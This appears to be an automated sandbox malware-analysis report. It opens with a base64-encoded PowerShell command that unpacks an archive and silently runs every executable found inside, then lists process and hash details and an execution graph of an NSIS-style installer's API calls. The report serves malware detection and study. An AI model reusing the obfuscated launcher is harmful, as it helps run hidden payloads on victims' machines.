AB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAApAAoAIAAgACAAIAAkAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD0AIAAkAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAuAE4AYQBtAGUAUwBwAGEAYwBlACgAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAKQAKAAoAIAAgACAAIAAkAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAuAEMAbwBwAHkASABlAHIAZQAoACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAuAEkAdABlAG0AcwAoACkALAAgADIAMAApAAoACgAgACAAIAAgACQAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbAAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAALQBQAGEAdABoACAAJAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAIAAtAEYAaQBsAHQAZQByACAAKgAuAGUAeABlACAALQBSAGUAYwB1AHIAcwBlAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ACAAaQBuACAAJABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsAGwAbABsACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgALgBGAHUAbABsAE4AYQBtAGUAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAC0AVwBhAGkAdAAKACAAIAAgACAAfQAKAAoAfQAKAAoAJgAgACQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAAgAD4AIAAkAG4AdQBsAGwAIAAyAD4AJgAxAA==
                                                                                                                                Imagebase:0xfd0000
                                                                                                                                File size:433'152 bytes
                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:20
                                                                                                                                Start time:19:46:25
                                                                                                                                Start date:07/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:17.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:21%
                                                                                                                                  Total number of Nodes:1482
                                                                                                                                  Total number of Limit Nodes:25
                                                                                                                                  execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 